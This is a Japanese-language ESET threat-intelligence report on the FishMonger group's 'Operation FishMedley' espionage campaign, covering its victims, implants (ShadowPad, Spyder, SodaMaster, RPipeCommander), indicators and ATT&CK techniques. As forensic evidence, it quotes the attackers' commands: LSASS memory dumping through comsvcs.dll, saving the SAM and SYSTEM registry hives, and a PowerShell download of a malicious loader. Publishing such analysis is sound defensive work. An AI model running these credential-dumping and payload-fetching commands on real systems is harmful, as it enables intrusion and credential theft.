FishMedley作戦:中国政府との関与を指摘されるI-SOONによる最新スパイ活動
ESETの研究者は、中国のセキュリティ企業といわれるI-SOONが運営するAPTグループ「FishMonger」によるグローバルなスパイ活動の詳細を明らかにしました。
Matthieu Faou 10 Apr 2025
2025年3月5日、米司法省は、中国政府のIT関連請負事業者であるI-SOONの従業員が、グローバルなスパイ活動に関与したとして起訴状を提出しました。これらのスパイ活動には、2022年にESETが「FishMedley作戦」と命名したキャンペーンの攻撃が含まれます。このキャンペーンでは、I-SOONが運営するAPTグループ「FishMonger」が、7つの組織を標的にして侵害しています。ESETは以前にもこれらの攻撃を報告しています。
本ブログの要点:
- FishMedley作戦の標的となっている業界は、アジア、ヨーロッパ、アメリカの政府機関、NGO、シンクタンクなどです。
- この作戦のオペレーターは、特徴的なインプラントを使用しています。これらのインプラントは、ShadowPad、SodaMaster、Spyderなど、中国とつながりのあるサイバー攻撃グループが一般的または独占的に使用しているものです。
- ESETは、FishMedley作戦がAPTグループ「FishMonger」によって実行されたことを確信しています。
- 司法省の起訴とは関係なく、ESETはFishMongerがI SOONによって運営されていると判断しています。
FISHMONGERのプロフィール
FishMongerグループは、中国政府のIT関連請負事業者であるI-SOON(「2023年第4四半期~2024年第1四半期のAPT活動レポート」を参照)が運営していると考えられています。FishMongerはWinnti Groupの傘下にあり、I-SOONのオフィスが設置されている中国の成都を拠点に活動している可能性があります。FishMongerは、Earth Lusca、TAG 22、Aquatic Panda、Red Dev 10としても知られています。ESETは、2019年6月に中国で始まった市民抗議活動の際に、香港の大学を標的として鮮烈な攻撃を行ったこの攻撃グループの分析を2020年初めに発表しました。ESETは当初、このインシデントはWinnti Groupによって引き起こされたと考えていましたが、その後、攻撃はFishMongerによるものであると修正しました。
Trend Microが報告しているように、このグループは水飲み場攻撃を行うことで知られています。FishMongerのツールセットには、ShadowPad、Spyder、Cobalt Strike、FunnySwitch、SprySOCKS、BIOPASS RATなどが含まれます。
概要
2025年3月5日、米司法省はプレスリリースを発表し、2016年から2023年にかけて複数のスパイ活動に関与したとしてI SOONの従業員と中国公安省の職員に対する起訴状を提出しました。FBIはまた、起訴状で名前が挙がっている人物を最重要指名手配犯のリストに追加し、ポスターを公開しました(図1を参照)。
起訴状には、ESETが2023年の初めに独自のAPTインテリジェンスレポートで公開した攻撃と深い関連性があるいくつかの攻撃が記載されています。このブログでは、アジア、ヨーロッパ、アメリカの政府機関、NGO、シンクタンクを標的としたこのグローバルなキャンペーンについての技術的な分析をお伝えします。ESETのこれらの情報は、最近公表された起訴状を補完する内容となっています。
2022年に、ESETはShadowPadやSodaMasterのような、中国とつながりのあるサイバー攻撃グループが一般的に使用しているインプラントが利用されたいくつかの侵害を調査しました。ESETは、このブログの公開にあたって、7つの個別のインシデント情報を収集し、これらの一連のキャンペーンを「FishMedley作戦」と命名しました。
FishMongerとI-SOON
調査を進める中で、FishMongerは、2024年に内部文書が漏洩した、中国の成都に拠点を置くIT関連請負事業者「I-SOON」が運営するスパイ活動組織であることを独自に確認しました。この詳細な分析については、Harfang Labsのレポートを参照してください。
標的となった国や組織
表1に、犠牲となった7つの組織の詳細を示します。業界や国は多岐にわたりますが、ほぼすべてが中国政府にとって明らかに関心のある組織です。
| 被害者 | 侵害された日付 | 国 | 業界 |
|---|---|---|---|
| A | 2022年1月 | 台湾 | 政府機関。 |
| B | 2022年1月 | ハンガリー | カトリック教会に関連する団体。 |
| C | 2022年2月 | トルコ | 不明。 |
| D | 2022年3月 | タイ | 政府機関。 |
| E | 2022年4月 | 米国 | 世界で活動するカトリックの慈善団体。 |
| F | 2022年6月 | 米国 | NGO - 主にアジアで活動。 |
| G | 2022年10月 | フランス | 地経学研究所。 |
表1. 標的となった国や組織の詳細
表2に、FishMedley作戦による各侵入で使用されたインプラントの要約を示します。
| ツール \ 被害者 | ScatterBeeが搭載された ShadowPad | Spyder | SodaMaster | RPipeCommander |
|---|---|---|---|---|
| A | X | |||
| B | X | |||
| C | X | |||
| D | X | X | X | |
| E | X | |||
| F | X | X | ||
| G | X |
表2. 各被害者に使用されたインプラントの詳細
技術的な分析
初期アクセス
ESETは、最初の侵入方法や経路を特定することはできませんでした。多くのケースで、攻撃者はドメイン管理者の認証情報など、ローカルネットワークの特権アクセスを取得していたと考えられます。
被害者Dのケースでは、攻撃者は管理コンソールにアクセスし、コンソールを使用してローカルネットワーク内の他のマシンにインプラントを展開しています。システム管理者かセキュリティアナリストのマシンを最初に侵害し、認証情報を窃取してコンソールにアクセスしたと考えられます。
被害者Fのケースでは、インプラントはImpacketを通じて配信されており、攻撃者は何らかの方法で特権のあるドメインアカウントを侵害しています。
ラテラルムーブメント
被害者Fのケースでは、オペレーターはImpacketを使用してラテラルムーブメントを行っていました。FishMongerは他のローカルマシンの情報を収集し、インプラントをインストールしています。
表3は、オペレーターが最初にquser.exe、wmic.exe、ipconfig.exeを使用して手動で偵察を行っていたことを示しています。その後、ローカルセキュリティ機関サブシステムサービス(LSASS)のプロセス(PID 944)をダンプして、認証情報や他のシークレットを取得しようとしています。プロセスのPIDは tasklist /svcによって取得され、環境寄生型バイナリ(LOLBIN)としても利用されるcomsvcs.dllを使用してダンプが実行されています。攻撃者は、quser.exeを実行し、他のユーザーや管理者もログインしているか、つまり特権アクセスがLSASSに存在しているかどうかを確認した可能性が高いです。Microsoftのドキュメントには、攻撃者がこのコマンドを使用するには、フルコントロールアクセス許可または特殊なアクセス許可が必要であることが記述されています。
また、攻撃者はレジストリハイブsam.hiveとsystem.hiveも保存しています。これらのハイブにはシークレットと認証情報の両方が含まれている可能性があります。
最後に、forループを使用してtasklist.exeから繰り返し出力し、LSASSプロセスを再度ダンプしようとしていました。過去に同じコードが他のマシンで使用されていたことが確認されていることから、このコードの実行をブロックするか、少なくとも警告するように設定することを推奨します。
| タイムスタンプ(UTC) | コマンド |
|---|---|
| 2022-06-21 07:34:07 | quser |
| 2022-06-21 14:41:23 | wmic os get lastbootuptime |
| 2022-06-21 14:41:23 | ipconfig /all |
| 2022-06-21 14:41:23 | tasklist /svc |
| 2022-06-21 14:41:23 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "C:\Windows\System32\rundll32 C:\windows\system32\comsvcs.dll, MiniDump 944 c:\users\public\music\temp.tmp full" |
| 2022-06-21 14:41:23 | reg save hklm\sam C:\users\public\music\sam.hive |
| 2022-06-21 14:41:23 | reg save hklm\system C:\users\public\music\system.hive |
| 2022-06-21 14:41:23 | net user |
| 2022-06-22 07:05:37 | tasklist /v |
| 2022-06-22 07:07:33 | dir c:\users |
| 2022-06-22 09:47:52 | for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\YDWS6P.xml full |
表3. 被害者FのマシンでImpacketによって実行されたコマンド
ツールセット
ShadowPad
ShadowPadは、広く知られているモジュラー型のバックドアで、SentinelOneが報告しているように、FishMongerやSparklingGoblinなど、中国とつながりのあるAPTグループのみが使用しています。FishMedley作戦では、攻撃者はScatterBeeが搭載されたShadowPadバージョンを使用しました。
被害者Dのケースでは、以下のPowerShellコマンドによってローダーがダウンロードされました。
powershell (new-object System.Net.WebClient).DownloadFile("http://<victim’s_web_server_IP_address>/Images/menu/log.dll";"c:\users\public\log.dll") これは、攻撃者が被害者組織のWebサーバーを侵害し、マルウェアのステージングサーバーとして使用したことを示しています。
被害者Fのケースでは、http://5.188.230[.]47/log.dllからローダーをダウンロードするためにFirefoxが使用されています。攻撃者がマシンへのアクセス権限を取得し手動で操作したのか、Firefoxプロセス内で別のマルウェアが実行されていたのか、あるいは水飲み場攻撃などによって被害者がダウンロードページにリダイレクトされたのかは不明です。
log.dllは、古いBitdefender実行ファイル(元の名前:BDReinit.exe)によってサイドローディングされ、log.dll.datというファイルからShadowPadを読み込みます。このファイルは、PwCのGitHubリポジトリで提供されているスクリプトを使用して復号できます。
被害者のマシンからはlog.dll.datを復元できませんでしたが、VirusTotalで同一のlog.dllファイルを使用するAdobe Flashの偽のインストーラーを発見しました。ShadowPadペイロードの設定を表4に示します。
| フィールド | 復号された値 |
|---|---|
| タイムスタンプ | 2022-03-14 22:52:16 |
| キャンペーンコード | 2203 |
| ファイルパス | %ALLUSERSPROFILE%\DRM\Test\ |
| なりすまし名 | Test.exe |
| ローダーファイル名 | log.dll |
| ペイロードのファイル名 | log.dll.dat |
| サービス名 | MyTest2 |
| 別のサービス名 | MyTest2 |
| 別のサービス名 | MyTest2 |
| レジストリキーのパス | SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
| サービスの説明 | MyTest2 |
| 挿入先のプログラム | %ProgramFiles%\Windows Media Player\wmplayer.exe |
| 別の挿入先 | N/A |
| 別の挿入先 | N/A |
| 別の挿入先 | %windir%\system32\svchost.exe |
| C&C URL | TCP://api.googleauthenticatoronline[.]com:443 |
| 別のC&C URL | UDP://api.googleauthenticatoronline[.]com:443 |
| 別のC&C URL | N/A |
| 別のC&C URL | N/A |
| プロキシ情報文字列 | SOCKS4\n\n\n\n\n |
| プロキシ情報文字列 | SOCKS4\n\n\n\n\n |
| プロキシ情報文字列 | SOCKS5\n\n\n\n\n |
| プロキシ情報文字列 | SOCKS5\n\n\n\n\n |
表4. ShadowPadの設定
2022年3月20日から2022年11月2日までの間、このC&Cドメインは213.59.118[.]124に解決されていました。これについては、ShadowPadに関するVMwareのブログで説明されています。
Spyder
被害者Dのケースでは、FishMongerが一般的に使用している別のバックドア「Spyder」が検出されました。Spyderは、モジュール型のインプラントであり、Dr.Webが詳細な分析結果を公開しています。
Spyderローダーは、http:///Images/menu/aa.docからダウンロードされ、ShadowPadがインストールされた18時間後にC:\Users\Public\task.exeとして配置されました。
このローダー(図2を参照)はファイルc:\windows\temp\guid.datを読み取り、AES-CBCを使用してコンテンツを復号します。この暗号化キーはハードコードされています(F4 E4 C6 9E DE E0 9E 82 00 00 00 00 00 00 00 00)。キーの最初の8バイトが初期化ベクトル(IV)として使用されています。残念ながら、guid.datファイルは復元できませんでした。
次に、ローダーは、図3に示すように、復号されたコンテンツ(おそらくシェルコード)を自分自身(task.exeプロセス)に挿入します。
暗号化された最終的なペイロードは取得できませんでしたが、ESET製品はメモリにあるSpyderペイロードを検出しました。このペイロードは、Dr.Webが説明しているSpyderの亜種とほぼ同じでした。このC&Cサーバーは61.238.103[.]165にハードコードされていました。
注意すべき点は、junlper[.]comの複数のサブドメインが、2022年に61.238.103[.]165に解決されたことです。このドメインは、SpyderのC&Cドメインであり、juniper.netを偽装したホモグリフドメインであることが確認されています。
89EDCFFC66EDA3AEB75E140816702F9AC73A75F0のサムプリントを持つ自己署名のTLS証明書が、2022年5月から12月までこのサーバーのポート443での通信に設定されていました。SentinelOneによると、これはFishMongerがC&Cサーバーで使用している証明書です。
SodaMaster
SodaMasterは、2021年にKasperskyが報告したバックドアです。APT10はこのバックドアを利用した最初のグループとして知られていましたが、FishMedley作戦の調査から、中国とつながりのある複数APTグループの間で共有されている可能性が浮かび上がってきました。
SodaMasterはメモリ内で復号された場合にのみ検出可能です。ESETもメモリでSodaMasterを検出しています。詳細なローディングチェーンは復元できませんでしたが、チェーンの最初のステップで使用されたいくつかの検体を特定しました。
SodaMasterローダー
ESETは、DLLサイドローディングによって正規の実行ファイルを悪用する6つの異なる悪意のあるDLLを発見しました。これらのDLLはすべて同じ復号と挿入ルーチンを実装しています。
最初に、ローダーはハードコードされたファイル、例えばdebug.pngを読み込み、ハードコードされた239バイトのキーを使ってXORで復号します。表5に、これらのさまざまなローダーを示します。XORキーも各検体で異なりますが、キーが長すぎるためこの表には含めていません。また、これらの暗号化されたペイロードも復元できませんでした。
| SHA-1 | DLLの名前 | ペイロードのファイル名 |
|---|---|---|
| 3C08C694C222E7346BD8633461C5D19EAE18B661 | DrsSDK.dll | |
| D8B631C551845F892EBB5E7D09991F6C9D4FACAD | libvlc.dll | \VLC.CNF |
| 3A702704653EC847CF9121E3F454F3DBE1F90AFD | safestore64.dll | |
| 3630F62771360540B66701ABC8F6C868087A6918 | DeElevator64.dll | |
| A4F68D0F1C72C3AC9D70919C17DC52692C43599E | libmaxminddb-0.dll | C:\windows\system32\MsKeyboardFilterapi.dll |
| 5401E3EF903AFE981CFC2840D5F0EF2F1D83B0BF | safestore641.dll |
表5. SodaMasterローダー
次に、復号されたバッファは、新しく作成され、一時停止されていたsvchost.exeプロセスに挿入されます(図4を参照)。
最後に、Windows XP以前のバージョンの場合は、CreateRemoteThreadを使用して、新しいWindowsバージョンの場合は、NtCreateThreadExを使用して、シェルコードが実行されます(図5を参照)。
表5に示す最後の4つのローダーには追加の機能があります。
- これらのローダーには、getAllAuthDataという名前のエクスポートがあり、Firefox向けのパスワード窃取ツールを実装しています。このエクスポートは、FirefoxのSQLiteデータベースを読み取り、クエリ(SELECT encryptedUsername, encryptedPassword, hostname,httpRealm FROM moz_logins)を実行します。
- 最後の3つのローダーは、それぞれNetlock、MsKeyboardFiltersrv、downmapという名前のサービスとして常駐します。
SodaMasterペイロード
以前に説明したように、SodaMasterペイロードはKasperskyによって分析および報告されています。ESETが検出したサンプルでは、過去に報告されたペイロードから大きな進化は見られていません。このペイロードは、2021年に存在していたのと同じ4つのバックドアコマンド(d、f、l、s)を実装しています。
表6に、ESETが特定した4つの異なるSodaMasterペイロードの設定を示します。オペレーターは被害者ごとに異なるC&Cサーバーを使用していましたが、被害者BとCはハードコードされた同じRSAキーを共有していました。
| 被害者 | C&Cサーバー | RSAキー |
|---|---|---|
| B | 162.33.178[.]23 | MIGJAoGBAOPjO7DslhZvp0t8HNU/NWPIwstzwi61JlevD6TJtv/TZuN6CgXMCXql0P3CBGPVU5gAJiTxH0vslwdIpWeWEZZ5eJVk0VK9vA6XfCsc4NDVDPm7M5EH5sxHQjRNfe6H6RqcayAQn2YXd0Yua4S22F9ZmocU7VcPyLQLeVZoKjcxAgMBAAE= |
| C | 78.141.202[.]70 | MIGJAoGBAOPjO7DslhZvp0t8HNU/NWPIwstzwi61JlevD6TJtv/TZuN6CgXMCXql0P3CBGPVU5gAJiTxH0vslwdIpWeWEZZ5eJVk0VK9vA6XfCsc4NDVDPm7M5EH5sxHQjRNfe6H6RqcayAQn2YXd0Yua4S22F9ZmocU7VcPyLQLeVZoKjcxAgMBAAE= |
| F | 192.46.223[.]211 | MIGJAoGBAMYOg+eoTREKaAESDXt3Uh3Y4J84ObD1dfl3dOji0G24UlbHdjUk3e+/dtHjPsRZOfdLkwtz8SIZZVVt3pJGxgx9oyRtckJ6zsrYm/JIK+7bXikGf7sgs5zCItcaNJ1HFKoA9YQpfxXrwoHMCkaGb9NhsdsQ2k2q4jT68Hygzq19AgMBAAE= |
| G | 168.100.10[.]136 | MIGJAoGBAJ0EsHDp5vtk23KCxEq0tAocvMwn63vCqq0FVmXsY+fvD0tP6Nlc7k0lESpB4wGioj2xuhQgcEjXEkYAIPGiefYFovxMPVuzp1FsutZa5SD6+4NcTRKsRsrMTZm5tFRuuENoEVmOSy3XoAS00mu4MM5tt7KKDlaczzhYJi21PGk5AgMBAAE= |
表6. SodaMasterの設定
RPipeCommander
被害者Dのケースでは、Spyderが実行された同じプロセスで、これまで知られていなかったインプラントが見つかりました。これは、ディスクからロードされたか、Spyderによってダウンロードされた可能性があります。DLLのエクスポート名がrcmd64.dllであったことから、ESETはこのインプラントをRPipeCommanderと命名しました。
RPipeCommanderは複数のタスクを同時に並行して処理でき、IoCompletionPortを使用して複数スレッドのI/O要求を管理します。また、名前付きパイプ \\.\Pipe\CmdPipe <PID>を作成します。この <PID >は、現在のプロセスIDであり、このプロセスがこのパイプからのデータの読み込みとパイプへのデータの書き込みを行います。
RPipeCommanderは、名前付きパイプから以下の3つのコマンドを受け付けるリバースシェルです。
- h (0x68):cmd.exeプロセスを作成し、コマンドを送信して出力を読み取るためにそのプロセスにパイプをバインドします。
- i (0x69):既存のcmd.exeプロセスでコマンドを記述するか、前のコマンドの出力を読み取ります。
- j (0x6A):コマンドシェルでexitrnを記述して、cmd.exeプロセスを終了します。
ESETが確認しているのはRPipeCommanderのサーバーサイドのみです。ローカルネットワークの別のマシンからサーバーにコマンドを送信するために、第2のコンポーネントであるクライアントが使用されているはずです。
最後に、RPipeCommanderはC++で記述されています。取得した検体にRTTI情報が含まれていたため、いくつかのクラス名を入手できました。
- CPipeServer
- CPipeBuffer
- CPipeSrvEvent
- CPipeServerEventHandler
その他のツール
上記のメインインプラントに加え、攻撃者はデータを収集または外部に送信するためにいくつかの追加ツールを使用しています。これらのツールについては、表7で説明します。
| ファイル名 | 詳細 |
|---|---|
| C:\Windows\system32\sasetup.dll | 独自のパスワードフィルタ。PasswordChangeNotifyエクスポートは、ユーザーがパスワードを変更したときに呼び出され、新しいパスワードをディスク上の現在の作業ディレクトリ内にあるetuper.logというログファイルに書き込みます。このエクスポートは、POSTデータにflag= |
| C:\Windows\debug\svhost.tmp | GitHubで利用可能なfscanネットワークスキャナー。 |
| C:\nb.exe | nbtscan - NetBIOSスキャナ。 |
| C:\Users\public\drop.zip | Dropboxを操作するためにGoで記述されたツールdbxcliだけが含まれています。このツールは、被害者のネットワークからデータを外部に送信させるために使用された可能性が高いと考えられますが、ESETは攻撃者のアカウントに関する情報は取得していません。 拡張子は.zipとなっていますが、これはCABファイルです。このCABファイルはhttp://45.76.165[.]227/wECqKe529r.pngからダウンロードされています。 また、ハッシュ(SHA-1:2AD82FFA393937A2353096FE2A2209E0EBC1C9D7)は実環境ではほぼ広がっていないことから、dbxcliは攻撃者によってコンパイルされていると考えられます。 |
表7. FishMedley作戦で使用されたその他のツール
結論
このブログでは、FishMongerが各国の重要な組織に対してキャンペーンを実行した方法と、2025年3月に米国司法省がFishMongerのメンバーを起訴したことについて説明しました。また、ShadowPadやSodaMasterなどの広く知られているインプラントは公開されてから長い年月が経過していますが、今でも、この攻撃グループはこれらのインプラントを再利用していることについても説明しました。最後に、ESETは中国企業のI SOONに所属している組織がFishMongerであることを独自の調査から確認しました。
ESETのセキュリティブログWeLiveSecurity掲載されたリサーチに関するお問い合わせは、threatintel@eset.comへお願いします。
ESET の独自の脅威インテリジェンスサービス(APTレポートとデータフィード)を提供しています。このサービスに関するお問い合わせは、ESET Threat Intelligence(ESET脅威インテリジェンス)のページをご覧ください。
| SHA-1 | ファイル名 | 検出 | 説明 |
|---|---|---|---|
| D61A4387466A0C999981086C2C994F2A80193CE3 | N/A | Win32/Agent.ADVC | ShadowPadドロッパー。 |
| 918DDD842787D64B244D353BFC0E14CC037D2D97 | log.dll | Win32/Agent.ADVC | ScatterBeeが搭載されたShadowPadローダー。 |
| F12C8CEC813257890F4856353ABD9F739DEED890 | task.exe | Win64/Agent.BEJ | Spyderローダー。 |
| 3630F62771360540B66701ABC8F6C868087A6918 | DeElevator64.dll | Win64/PSW.Agent.CU | SodaMasterローダー。 |
| 3C08C694C222E7346BD8633461C5D19EAE18B661 | DrsSDK.dll | Win64/Agent.CAC | SodaMasterローダー。 |
| 5401E3EF903AFE981CFC2840D5F0EF2F1D83B0BF | safestore64.dll | Win64/PSW.Agent.CU | SodaMasterローダー。 |
| A4F68D0F1C72C3AC9D70919C17DC52692C43599E | libmaxminddb-0.dll | Win64/PSW.Agent.CU | SodaMasterローダー。 |
| D8B631C551845F892EBB5E7D09991F6C9D4FACAD | libvlc.dll | Win64/Agent.BFZ | SodaMasterローダー。 |
| 3F5F6839C7DCB1D164E4813AF2E30E9461AB35C1 | sasetup.dll | Win64/PSW.Agent.CB | 悪意のあるパスワードフィルタ。 |
ネットワーク
| IP | ドメイン | ホスティングプロバイダー | 最初に確認された日付 | 詳細 |
|---|---|---|---|---|
| 213.59.118[.]124 | api.googleauthenticatoronline[.]com | STARK INDUSTRIES | 2022年3月20日 | ShadowPadのC&Cサーバー。 |
| 61.238.103[.]165 | N/A | IRT-HKBN-HK | 2022年3月10日 | SpyderのC&Cサーバー。 |
| 162.33.178[.]23 | N/A | BL Networks | 2022年3月28日 | SodaMasterのC&Cサーバー。 |
| 78.141.202[.]70 | N/A | The Constant Company | 2022年5月18日 | SodaMasterのC&Cサーバー。 |
| 192.46.223[.]211 | N/A | Akamai Connected Cloud | 2022年06月22日 | SodaMasterのC&Cサーバー。 |
| 168.100.10[.]136 | N/A | BL Networks | 2022年05月12日 | SodaMasterのC&Cサーバー。 |
MITRE ATT&CKの技術
この表は、MITRE ATT&CKフレームワークのバージョン16を使用して作成されています。
| 手法 | ID | 名前 | 説明 |
|---|---|---|---|
リソース開発 | T1583.004 | インフラストラクチャの取得:サーバー | FishMongerは、複数のホスティングプロバイダーからサーバーをレンタルしていました。 |
| T1583.001 | インフラストラクチャの取得:ドメイン | FishMongerは、ドメインを購入し、C&Cサーバーとの通信に利用していました。 | |
実行 | T1059.001 | コマンドラインインターフェイス:PowerShell | FishMongerは、PowerShellを使用してShadowPadをダウンロードしました。 |
| T1059.003 | コマンドラインインターフェイス:Windowsコマンドシェル | FishMongerは、BATスクリプトを使ってSpyderを展開しました。 | |
| T1072 | ソフトウェア展開ツール | FishMongerは、ローカル管理コンソールにアクセスし、コンソールを悪用して被害者のネットワークにある他のマシンでコマンドを実行しました。 | |
| 常駐化 | T1543.003 | システムプロセスの作成または修正:Windowsサービス | いくつかのSodaMasterローダーは、Windowsサービスを利用して常駐します。 |
防衛機能の回避 | T1574.002 | ハイジャックの実行フロー:DLLサイドローディング | ShadowPadは、正規のBitdefenderの実行ファイルによってサイドローディングされるlog.dllというDLLによってロードされます。 |
| T1140 | ファイルや情報の難読化解除と復号 | ShadowPad、Spyder、SodaMasterは、復号されメモリにロードされます。 | |
認証情報へのアクセス | T1555.003 | パスワードの保管場所からの認証情報の窃取:Webブラウザからの認証情報の窃取 | いくつかのSodaMasterローダーは、ローカルのFirefoxデータベースからパスワードを抽出できます。 |
| T1556.002 | 認証プロセスの変更:パスワードフィルタDLL | FishMongerは、パスワードをディスクに書き込んだり、リモートサーバーに流出させたりできる独自のパスワードフィルタDLLを使用していました。 | |
| T1003.001 | OS認証情報のダンプ:LSASSメモリ | FishMongerは、rundll32 C:\windows\system32\comsvcs.dll, MiniDumpを使用してLSASSメモリをダンプしました。 | |
| T1003.002 | OS認証情報のダンプ:セキュリティアカウントマネージャー | FishMongerは、reg save hklm\sam C:\users\public\music\sam.hiveを使用して、セキュリティアカウントマネージャーをダンプしました。 | |
探査 | T1087.001 | アカウント情報の探索ローカルアカウント | FishMongerは、net userコマンドを実行しました。 |
| T1016 | システムネットワーク構成の検出 | FishMongerは、ipconfig /allコマンドを実行しました。 | |
| T1007 | システムサービスの検出 | FishMongerは、tasklist /svcコマンドを実行しました。 | |
| T1057 | プロセスの検出 | FishMongerは、tasklist /vコマンドを実行しました。 | |
| ラテラルムーブメント | T1021.002 | リモートサービス:SMB/Windows管理共有 | FishMongerは、Impacketを使用して、ローカルネットワークの他のマシンにマルウェアを展開しました。 |
| C&C(コマンド&コントロール) | T1095 | アプリケーションレイヤープロトコル以外の手法: | ShadowPadは、TCPおよびUDPプロトコルを使用してネットワーク上で直接データを通信しています。 |
